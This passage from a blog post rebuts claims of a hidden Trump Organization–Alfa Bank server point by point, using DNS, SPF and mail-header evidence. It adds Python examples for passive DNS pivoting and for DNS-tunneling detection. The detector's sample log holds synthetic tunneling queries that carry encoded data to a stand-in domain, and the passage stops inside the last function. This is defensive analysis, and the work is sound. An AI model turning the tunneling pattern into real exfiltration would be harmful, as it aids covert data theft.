We should note that Cendyn transferred the TRUMP-EMAIL.COM domain to Trump Organization on March 8, 2017, thus all attempts to resolve the domain since that date would return the IP address of GoDaddy domain parking server.</div>
<div class="separator" style="clear: both;">
<br /></div>
<h2 style="text-align: left;">
<span style="color: #ffd966;">Claims and Counterclaims: </span></h2>
<h3 style="text-align: left;">
</h3>
<h3 style="text-align: left;">
<span style="font-weight: normal;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><i>Before May 2016:</i></span></span></h3>
<div>
<span style="color: #ffd966;"><span style="color: #9fc5e8;"><span style="color: #a2c4c9;"><span style="font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 1</b></span>:</span></span><span style="color: #ffd966;"> </span></span></span><br />
<i style="font-family: georgia, "times new roman", serif;">Trump campaign press secretary Hope Hicks: “First of all, it’s not a secret server. The email server, set up for marketing purposes and operated by a third-party, has not been used since 2010. The current traffic on the server from Alphabank’s [sic] IP address is regular DNS server traffic – not email traffic.” (Src. <a href="https://www.theguardian.com/us-news/2016/oct/31/trump-organization-server-russia-bank-slate-report">Guardian</a>)</i></div>
<div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<span style="color: cyan;"><span style="color: cyan; font-family: inherit; font-weight: bold;"> </span><span style="color: #e69138;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 1:</b></span></span></span></blockquote>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">As you can see in the <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">last message header</a>, the last message was received from the server MAIL1.TRUMP-EMAIL.COM on 66.216.133.29 on February 29, 2016. (src. DeepEnd Research)</span></li>
</ul>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">A tweetbot was still posting links from Trump Hotels' marketing emails in February 2016, the last one on Feb. 29, 2016 (src. <a href="https://twitter.com/search?f=tweets&q=links.trump-email.com&src=typd">Twitter</a>)</span></li>
</ul>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">Cendyn acknowledged that the last marketing email it delivered for Trump's corporation was sent in March 2016 (Src. <a href="http://www.cnn.com/2017/03/09/politics/fbi-investigation-continues-into-odd-computer-link-between-russian-bank-and-trump-organization/index.html">CNN</a>)</span></li>
</ul>
</blockquote>
</div>
<div>
<div class="separator" style="clear: both;">
</div>
<div style="text-align: left;">
<br class="Apple-interchange-newline" />
<hr />
<h3 style="text-align: left;">
<b><span style="color: #9fc5e8; font-family: inherit;"><i>May 2016 - September 23, 2016. Logs and log time period:</i></span></b></h3>
<span style="color: #ffd966;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #9fc5e8;"><b><span style="color: #9fc5e8;">Claim 2:</span></b></span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>Trump and Russia’s largest private bank communicated via a hidden server </i></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>since at least 2016 May. </i></span><i><span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a>)</span></i></div>
</div>
<div>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<span style="color: white;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 2:</b></span><span style="font-weight: bold;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"> </span><span style="color: white; font-family: inherit;">Not hidden and did not communicate intentionally</span></span></span></blockquote>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<div style="text-align: left;">
</div>
<ul style="text-align: left;">
<li style="text-align: left;"><span style="font-family: inherit;">As many have already pointed out, the server sits in a server farm belonging to a hosting company and is one of many used by Cendyn (the company the Trump Organization used for mailing services). It is no more hidden than any server at any cloud services provider.</span></li>
</ul>
<ul style="text-align: left;">
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheQB7oQn2DCmwOk82CGCBHDCWH97XXVS_d0PFNPglGM6MEGhRErSXEpBnzRMzAHA-iYCKT5IgX9zENBzSrGh0O-h55vnzm731kEkbY5Bn2cMH30-UoGfXn_WNbik708WlRuEgMk6HlfeiF/s1600/screenshot-1763.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEheQB7oQn2DCmwOk82CGCBHDCWH97XXVS_d0PFNPglGM6MEGhRErSXEpBnzRMzAHA-iYCKT5IgX9zENBzSrGh0O-h55vnzm731kEkbY5Bn2cMH30-UoGfXn_WNbik708WlRuEgMk6HlfeiF/s200/screenshot-1763.png" width="115" /></a></td></tr>
<tr><td class="tr-caption" style="font-size: 12.8px; text-align: center;">Subdomains of<br />
CONTACT-CLIENT.COM</td></tr>
</tbody></table>
<li style="text-align: left;"><span style="font-family: inherit;">You can see other servers with similar domain names registered by Cendyn in the 66.216.133.0/24 range (src. <a href="http://bgp.he.net/net/66.216.133.0/24#_dns">Hurricane Electric</a>) and look at the domain siblings (<a href="http://help.logicnow.com/mail/documentation/Content/ACM/Topics/MgntConfig-SettingPrefs/What%20is%20a%20sibling%20domain.htm">sibling domains</a> are subdomains that share a common suffix which is not a <a href="https://publicsuffix.org/list/public_suffix_list.dat">public suffix</a>) (src. <a href="https://www.virustotal.com/en/domain/trump1.contact-client.com/information/">Virustotal pDNS</a>). </span></li>
</ul>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<ul style="text-align: left;">
<li style="text-align: left;">A long list of subdomains of CONTACT-CLIENT.COM shows other clients on Cendyn with similar domains. (see <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNpiu0wgDwI-BTznTDwZVDHOfARTJwGRSlOYb3IXTvHsI7WK8-rrXUw3Th-4-dKCNbberZWnAkg1vTumhY7_JetsLLiOerZ5xJGvjdvRDBngRQLdm_EsUxQXV5avZClPyVsKp0kdHyiSYm/s1600/screenshot-1763.png">Virustotal pDNS Contact-client.com subdomains</a>)</li>
</ul>
<ul>
<li style="text-align: left;">"The RData for this host were served by the Central Dynamics (CC-801) authority resolvers ns{1,2,3}.cdcservices.com."(src. <a href="https://gdd53.wordpress.com/">GDD</a>). Central Dynamics (Cendyn) maintained the DNS records for this domain just as it does for its other customers. Other domains Cendyn registered and maintained for Trump were: </li>
</ul>
</blockquote>
<blockquote class="tr_bq" style="text-align: left;">
<blockquote class="tr_bq">
<ul style="text-align: left;">
<li style="text-align: left;">TRUMP1.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/66.216.133.29">66.216.133.29</a> (Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.MLINKS.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/168.235.224.14">168.235.224.14 </a>(Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.TRANSACTIONAL.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/64.135.26.234">64.135.26.234</a> (Cendyn's range)</li>
</ul>
<ul style="text-align: left;">
<li>TRUMP.MARKETING.CONTACT-CLIENT.COM <a href="http://whatismyipaddress.com/ip/64.135.26.234">64.135.26.234</a> (Cendyn's range)</li>
</ul>
</blockquote>
</blockquote>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<ul>
<li style="text-align: left;">MAIL1.TRUMP-EMAIL.COM <a href="http://whatismyipaddress.com/ip/66.216.133.29">66.216.133.29</a> (now resolves to 184.168.221.46, GoDaddy domain parking) </li>
</ul>
<ul>
<li>LINKS.TRUMP-EMAIL.COM CNAME customers.listrak.com (now resolves to 184.168.221.46, GoDaddy domain parking)</li>
</ul>
</blockquote>
</blockquote>
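<div>The two pivots used above, finding every name that resolved to an address and finding sibling names under the same registrable domain, as an added example in Python (this is not code from the original post). The record tuples reproduce name/IP pairs listed on this page; the public suffix table is a deliberately tiny hard-coded subset, an assumption standing in for the real Public Suffix List, and the record set carries no timestamps.</div>

```python
"""Pivoting through a passive DNS record set: names on an IP, sibling domains.

Added example; this is not code from the DeepEnd Research post. The record
tuples reproduce name/IP pairs listed in the post (timestamps omitted); the
public suffix table is a deliberately tiny hard-coded subset (assumption)
standing in for the real Public Suffix List.
"""
from collections import defaultdict

# Constructed record set: (name, rrtype, rdata), built from the names the post
# lists as Cendyn-maintained plus the parked name from the pDNS table above.
RECORDS = [
    ("mail1.trump-email.com", "A", "66.216.133.29"),
    ("trump1.contact-client.com", "A", "66.216.133.29"),
    ("trump.mlinks.contact-client.com", "A", "168.235.224.14"),
    ("trump.transactional.contact-client.com", "A", "64.135.26.234"),
    ("trump.marketing.contact-client.com", "A", "64.135.26.234"),
    ("links.trump-email.com", "CNAME", "customers.listrak.com"),
    ("thej35t3rpwns.trump-email.com", "A", "184.168.221.46"),
]

# Assumption: a tiny stand-in for the Public Suffix List. A real pivot loads
# https://publicsuffix.org/list/public_suffix_list.dat and applies its rules.
PUBLIC_SUFFIXES = {"com", "net", "org", "co.uk"}


def registrable_domain(name):
    """Return the longest public suffix plus one label ('contact-client.com'),
    or None when the name is itself a public suffix or matches no rule."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):               # longest candidate suffix first
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return None if i == 0 else ".".join(labels[i - 1:])
    return None


def names_for_ip(records, ip):
    """Rdata pivot: every name whose A record carried this address."""
    return sorted({n for n, t, r in records if t == "A" and r == ip})


def siblings(records, name):
    """Sibling domains: other names under the same registrable domain."""
    base = registrable_domain(name)
    return sorted({n for n, _, _ in records
                   if n != name and registrable_domain(n) == base})


def registrables_per_ip(records):
    """Map each address to the registrable domains seen on it. Several
    unrelated registrable domains on one address is the shared marketing
    host pattern; here both names on 66.216.133.29 belong to one customer."""
    seen = defaultdict(set)
    for n, t, r in records:
        if t == "A":
            seen[r].add(registrable_domain(n))
    return {ip: sorted(domains) for ip, domains in seen.items()}


if __name__ == "__main__":
    print(names_for_ip(RECORDS, "66.216.133.29"))
    print(siblings(RECORDS, "mail1.trump-email.com"))
    print(registrables_per_ip(RECORDS))
```

<div>Against a real passive DNS export the only change needed is to load the full Public Suffix List into <tt>PUBLIC_SUFFIXES</tt>; the registrable-domain walk already picks the longest matching rule, which is what separates <tt>example.co.uk</tt> from <tt>co.uk</tt>.</div>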
<br class="Apple-interchange-newline" />
<hr />
<span style="color: #ffd966;"><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><span style="color: #ffd966;"><b><span style="color: #9fc5e8;">Claim 3:</span></b> </span></span></span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Trump’s host mail1.trump-email.com operated a Listrak virtual mail transfer agent outside the SPF sending range, configured for outbound delivery. "<span style="font-family: "georgia" , "times new roman" , serif;">(src. <a href="https://gdd53.wordpress.com/">GDD</a> and <a href="http://www.slate.com/articles/news_and_politics/politics/2016/11/the_trump_server_evaluating_new_evidence_and_countertheories.html">Slate</a>)</span></i></span><br />
<div>
<span style="font-family: "georgia" , "times new roman" , serif;"><i><span style="font-family: "georgia" , "times new roman" , serif;"><br /></span></i></span>
<span style="font-family: "georgia" , "times new roman" , serif;"><i><span style="font-family: "georgia" , "times new roman" , serif;">"The scientists theorized that the Trump and Alfa Bank servers had a secretive relationship after testing the behavior of mail1.trump-email.com using sites like Pingability. When they attempted to ping the site, they received the message “521 lvpmta14.lstrk.net does not accept mail from you.” </span></i></span> (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</div>
<div>
<blockquote class="tr_bq">
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 3:</b></blockquote>
</blockquote>
<blockquote class="tr_bq">
<ul>
<li>Robert Graham from Errata Security already explained that this is how Listrak configures email marketing servers. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMtsEBIrKuW">Errata Security</a>). </li>
</ul>
</blockquote>
<blockquote class="tr_bq">
<ul>
<li>As for "outside of SPF range": Cendyn's SPF records for TRUMP-EMAIL.COM and CONTACT-CLIENT.COM (the envelope sender domain) both included the <b><u><span style="color: cyan;">mx</span></u></b> mechanism, and the MX host is the same for all of Cendyn's domains, <i>incoming.cdcservices.com</i>. The mx mechanism authorizes whatever addresses the domain's MX hosts resolve to at check time, so the record does not have to list every sending IP explicitly. Its limitation is that it only covers a sending host that is also (or shares addresses with) an MX host of the domain; a send-only host that is not behind the MX name is not covered by it. For the TRUMP-EMAIL.COM record quoted below, none of the ip4 ranges contain 66.216.133.29, so a pass for that address could only come from the mx mechanism. Note also that SPF is evaluated against the envelope sender domain, which in the quoted header is b.contact-client.com rather than trump-email.com. See the <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6xFZR0UxoxeRZOIA5yFOZwPwgXEODCpJ1nXZ2XS45ynR0Al5QJbumol5-hhoZi5zED5NCaQOHe0968Gsm4-I9XzcArT5lPAGb9-RPVA-1cFv-eWl2RRZeniMrjv1NAj2lv-EWq-7lrPig/s1600/header.png">header</a> and note <span style="font-family: "menlo"; font-size: 11px;">Received-SPF: pass</span></li>
</ul>
</blockquote>
<blockquote class="tr_bq">
<span style="color: #fff2cc; font-family: "menlo";"><span style="font-size: 11px;"><b>SPF records for TRUMP-EMAIL.COM: </b></span></span><span style="font-family: "courier new" , "courier" , monospace;"><span style="font-family: "menlo";"><span style="font-size: 11px;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2014-11-14 11:17:46 -0000</span></span><span style="font-family: "menlo";"><span style="font-size: 11px;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2016-09-23 12:59:33 -0000</span></span><span style="font-family: "menlo";"><span style="font-size: 11px;">trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>TXT<span class="Apple-tab-span" style="white-space: pre;"> </span>"Internet Solution from Cendyn.com." </span></span><span style="font-family: "menlo";"><span style="font-size: 11px;"><br /></span></span><span style="font-family: "menlo"; font-size: 11px;">trump-email.com.</span><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-family: "menlo"; font-size: 11px;">TXT</span><span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-family: "menlo"; font-size: 11px;">"v=spf1 ip4:198.91.42.0/23 ip4:64.135.26.0/24 ip4:64.95.241.0/24 ip4:206.191.130.0/24 ip4:63.251.151.0/24 ip4:69.25.15.0/24 <u><span style="color: #f4cccc;">mx</span></u> ~all"</span></span><br />
<span style="color: #fff2cc;">SPF check from email header:</span><span style="font-family: "courier new" , "courier" , monospace;"><b>Received-SPF: pass </b>(google.com: domain of H46ERELB4L1O917PENAM0QLOBKO2PO7OTETRAA30GQDB7GOSSGRVKCR5AKPE3C9@b.contact-client.com designates 66.216.133.29 as permitted sender) client-ip=66.216.133.29;</span></blockquote>
<br />
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 4:</span></b><span style="color: #f1c232; font-family: "trebuchet ms" , sans-serif; font-weight: bold;"> </span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Since May of 2016 only two networks resolved the mail1.trump-email.com host, AS15632 (JSC Alfa-Bank) and AS30710 (Spectrum Health). Alfa Bank is Russia’s largest bank and Spectrum Health is a integrated, managed care health care organization in Michigan."(src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><a href="https://gdd53.wordpress.com/">GDD</a></span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #9fc5e8; font-family: inherit;"><b><span style="font-family: "trebuchet ms" , sans-serif;">Response 4:</span><span style="font-family: inherit;"> </span></b></span></blockquote>
<blockquote class="tr_bq">
The logs show more than two companies (src. <a href="http://ljean.com/NetworkRecords/DNS-Lookups-For-mail1.trump-email.com-Through-9-14.txt">LJean.com</a>)</blockquote>
<blockquote class="tr_bq">
Other companies that are not shown in the logs also made such queries (src. <a href="https://twitter.com/russellbrandom/status/793289191555825664">Twitter</a> - via Errata Security) </blockquote>
<blockquote class="tr_bq">
Robert Graham has covered that topic. (src.<a href="http://blog.erratasec.com/2016/11/debunking-trumps-secret-server.html#.WM7vbBIrLKi"> Errata Security</a>) </blockquote>
<hr />
<span style="color: #9fc5e8;"><span style="font-weight: bold;"><b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 5:</span></b> </span></span><br />
<span style="color: #9fc5e8;"><span style="font-weight: bold;"> </span></span><span style="font-family: "georgia" , "times new roman" , serif;"><i>Spikes in the communications correlate with the political events in the Summer of 2016 .(src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><span style="font-family: "georgia" , "times new roman" , serif;"><a href="https://gdd53.wordpress.com/">GDD</a></span></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Response 5: </b></span></blockquote>
<blockquote class="tr_bq">
Some spikes correlate and others don't.</blockquote>
<blockquote class="tr_bq">
Robert Graham has covered that topic. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>)</blockquote>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif;"><b>Claim 6</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">: </span><br />
<div>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>"Strange combined domain name (mail.trump-email.com.moscow.alfaintra.net) seen in Alfa Bank logs mean "Moscow division of the INTERNAL Alfa Bank network most definitely has purposeful communications with a hostname registered by the Trump Organization. "(src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span><br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 6:</b></blockquote>
<blockquote class="tr_bq">
It is normal Windows behavior: when a lookup of a dotted name fails, the Windows resolver retries it with the machine's primary DNS suffix (and then its DNS suffix search list) appended, so a query for a host under trump-email.com from a machine in the moscow.alfaintra.net domain reappears in the resolver logs as the combined name. Look up the Primary DNS suffix, DNS suffix search list and name devolution settings. Robert Graham already covered it. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>)</blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 7:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; text-align: right;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHGHBHb54yqJqHFR5o8a8S4bbm1ey91SwIZ_4ZHIfnuHYSlzNM_2Sy2kXTrwVAs9gnc7goYnaTGGAcn9G-aqvStqf_fCWWo5JfdzfT9x_1BSZo21Wwa55iPgirvKb4RvwNY-ai43X-F1r/s1600/cendyn-headquarters.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHGHBHb54yqJqHFR5o8a8S4bbm1ey91SwIZ_4ZHIfnuHYSlzNM_2Sy2kXTrwVAs9gnc7goYnaTGGAcn9G-aqvStqf_fCWWo5JfdzfT9x_1BSZo21Wwa55iPgirvKb4RvwNY-ai43X-F1r/s200/cendyn-headquarters.jpg" width="200" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Cendyn headquarters</td></tr>
</tbody></table>
<span style="font-family: "georgia" , "times new roman" , serif;"><i>IP address 66.216.133.29 doesn't appear on spam blocklists thus unlikely to be a spam server (src. </i></span><i style="font-family: Georgia, "Times New Roman", serif;"><a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a></i><span style="font-family: "georgia" , "times new roman" , serif;"><i>)</i></span><br />
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 7:</b></blockquote>
<blockquote class="tr_bq">
<a href="http://www.cendyn.com/">Cendyn</a> is a marketing company, they do their best to avoid being blacklisted as it would undermine their business.</blockquote>
<blockquote class="tr_bq">
Robert Graham already covered it. (src. <a href="http://blog.erratasec.com/2016/11/in-which-i-have-to-debunk-second-time.html#.WMWiGhIrLKh">Errata Security</a>) </blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 8:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>CenDyn stated the reason they recreated a trump1.contact-client.com hostname pointing to this same IP address was for the Trump Organization to use the CRM software CenDyn provides to the Trump Organization." (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</i></span><br />
<blockquote class="tr_bq">
<span style="color: #f1c232; font-family: inherit;"><b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 8:</b><b> </b></span></blockquote>
<blockquote class="tr_bq">
It is possible they needed TRUMP1.CONTACT-CLIENT.COM after they removed MAIL1.TRUMP-EMAIL.COM; we do not know when that happened. We know when TRUMP1.CONTACT-CLIENT.COM first showed up in the DNS logs and in the passive DNS database, but that is not direct evidence of its creation and assignment date. </blockquote>
<hr />
<b style="color: #ffd966; font-family: "trebuchet ms", sans-serif;"><span style="color: #9fc5e8;">Claim 9:</span></b><span style="color: #f1c232; font-weight: bold;"> </span><br />
<span style="color: #f1c232;"><span style="font-family: "georgia" , "times new roman" , serif; font-weight: bold;"><i></i></span></span><i><span style="font-family: "georgia" , "times new roman" , serif;">"CenDyn states that their servers are not dedicated to a specific client. Yet the Internet-Wide Scan Data Repository (scans.io) data show that the hostname mail1.Trump-Email.com has been stable since at least 2013. It did not change for three years, then did change on on 23 September 2016. At the time of this writing, 2 October 2016, no other hostname has pointed to this IP 66.216.133.29:just trump1.contact-client.com and mail1.trump-email.com. So this IP address is associated with only that server. " (src. <a href="http://ljean.com/NetworkRecords/intranet/">LJean.com</a>)</span></i><br />
<span style="color: #bf9000; font-weight: bold;"><br /></span>
<br />
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 9:</b></blockquote>
<blockquote class="tr_bq">
This is correct. It appears that 66.216.133.29 was dedicated to the Trump Organization. The PTR record for that address has still not been updated.</blockquote>
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2010-07-02 19:20:22 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2016-09-13 01:47:56 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29 </span><br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;">first seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2017-03-08 04:32:26 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">last seen<span class="Apple-tab-span" style="white-space: pre;"> </span>2017-03-19 17:41:34 -0000</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>184.168.221.46 < now</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "times" , "times new roman" , serif;">Reverse DNS</span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "courier new" , "courier" , monospace;">Rdata results for ANY/ 66.216.133.29</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">mail1.trump-email.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29</span><br />
<span style="font-family: "courier new" , "courier" , monospace;">trump1.contact-client.com.<span class="Apple-tab-span" style="white-space: pre;"> </span>A<span class="Apple-tab-span" style="white-space: pre;"> </span>66.216.133.29</span></blockquote>
<hr />
<span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;"><b>Claim 10</b></span><span style="color: #9fc5e8; font-family: "trebuchet ms" , sans-serif; font-weight: bold;">:</span><br />
<span style="font-family: "georgia" , "times new roman" , serif;"><i>DNS was possibly used to conceal data and commands within DNS traffic using the technique called DNS tunneling (<a href="https://twitter.com/search?q=trump%20dns%20tunneling&src=typd">as many ask on Twitter</a>)</i></span></div>
</div>
</div>
<div>
<blockquote class="tr_bq">
<b style="color: #9fc5e8; font-family: "trebuchet ms", sans-serif;">Response 10:</b></blockquote>
<blockquote class="tr_bq">
Not on the evidence provided, but for a different reason than the record type alone. A DNS tunnel carries its uplink inside the query name, whatever record type is requested, so an "A" query can still be a covert channel; what the logs show, however, is one short, fixed, human-readable name (mail1.trump-email.com) looked up again and again, not the long, high-entropy, ever-changing labels a tunnel has to generate to move data. The downlink is where the record type matters: an "A" answer carries four bytes per record, which is why tunnels prefer "TXT", "NULL" or "CNAME" responses that can hold arbitrary data. (<a href="https://zeltser.com/c2-dns-tunneling/">Tunneling Data and Commands Over DNS to Bypass Firewalls</a> by Lenny Zeltser)</blockquote>
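<div>The indicators just described, applied to resolver query logs, as an added example in Python (not code from the original post, and not the logs themselves). The log lines are constructed in a made-up format: one source repeats the fixed name discussed in this post, once with the Windows search suffix from Claim 6 appended, and a second, synthetic source behaves like a tunneling client that stuffs encoded payload into the leftmost label. The source addresses are RFC 5737 documentation addresses, the local suffix list and all thresholds are assumptions, and the suffix-stripping step exists so that a suffix-appended retry is not counted as a new name.</div>

```python
"""Heuristic triage of resolver query logs for DNS-tunneling behaviour.

Added example; this is not code from the DeepEnd Research post. LOG_LINES is
a constructed sample in a made-up format: one source repeats the fixed name
the post discusses (once with a Windows search suffix appended, as in
Claim 6) and a second, synthetic source behaves like a tunneling client.
Source addresses are RFC 5737 documentation addresses; thresholds are
assumptions chosen for illustration.
"""
import math
import re
from collections import defaultdict

LOG_LINES = """\
2016-07-14T10:01:02 src=192.0.2.10 type=A qname=mail1.trump-email.com
2016-07-14T10:01:40 src=192.0.2.10 type=A qname=mail1.trump-email.com.moscow.alfaintra.net
2016-07-14T10:02:11 src=192.0.2.10 type=A qname=mail1.trump-email.com
2016-07-14T10:02:59 src=192.0.2.10 type=A qname=mail1.trump-email.com
2016-07-14T10:03:00 src=198.51.100.7 type=TXT qname=aGVsbG8gd29ybGQgdGhpcyBpcw.MzI4OTQ3OTgyMzQ.t.example.org
2016-07-14T10:03:01 src=198.51.100.7 type=A qname=dGhlIHNlY3JldCBkYXRhIGZsb3dz.MzI4OTQ3OTgyMzU.t.example.org
2016-07-14T10:03:02 src=198.51.100.7 type=TXT qname=c2VudCBvdXQgaW4gY2h1bmtz.MzI4OTQ3OTgyMzY.t.example.org
2016-07-14T10:03:03 src=198.51.100.7 type=TXT qname=YmFzZTY0IHRoZW4gc3BsaXQ.MzI4OTQ3OTgyMzc.t.example.org
"""

# Local search suffix seen in the logs per the post's Claim 6 (assumption that
# it is the only one; a real deployment lists every site suffix).
LOCAL_SUFFIXES = ("moscow.alfaintra.net",)

LINE_RE = re.compile(r"src=(\S+) type=(\S+) qname=(\S+)")


def strip_search_suffix(qname):
    """Undo Windows suffix appending: a failed lookup of host.example.com is
    retried as host.example.com.<primary suffix>. Collapsing the retry onto
    the original name keeps it from counting as a fresh, unique query name."""
    for suffix in LOCAL_SUFFIXES:
        if qname.lower().endswith("." + suffix):
            return qname[: -len(suffix) - 1]
    return qname


def shannon_entropy(text):
    """Bits per character; encoded payload labels score far above plain words."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def summarise(log_text):
    """Per-source features: volume, name churn, leftmost-label length and
    entropy, and the share of record types able to carry a bulky downlink."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if m:
            src, rtype, qname = m.groups()
            per_src[src].append((rtype.upper(), strip_search_suffix(qname)))
    stats = {}
    for src, queries in per_src.items():
        names = [q for _, q in queries]
        first_labels = [q.split(".")[0] for q in names]
        stats[src] = {
            "queries": len(queries),
            "distinct_names": len(set(names)),
            "mean_label_len": sum(map(len, first_labels)) / len(first_labels),
            "mean_label_entropy": sum(map(shannon_entropy, first_labels)) / len(first_labels),
            "bulky_type_share": sum(t in ("TXT", "NULL", "CNAME") for t, _ in queries) / len(queries),
        }
    return stats


def tunneling_score(s):
    """Number of tunneling indicators tripped (0 to 4). Thresholds are assumptions."""
    score = 0
    if s["distinct_names"] / s["queries"] > 0.5:    # nearly every query is a new name
        score += 1
    if s["mean_label_len"] > 20:                     # long leftmost labels
        score += 1
    if s["mean_label_entropy"] > 3.5:                # encoded data, not words
        score += 1
    if s["bulky_type_share"] > 0.3:                  # TXT/NULL/CNAME downlink
        score += 1
    return score


def score_log(log_text):
    """Map each source address in the log to its indicator count."""
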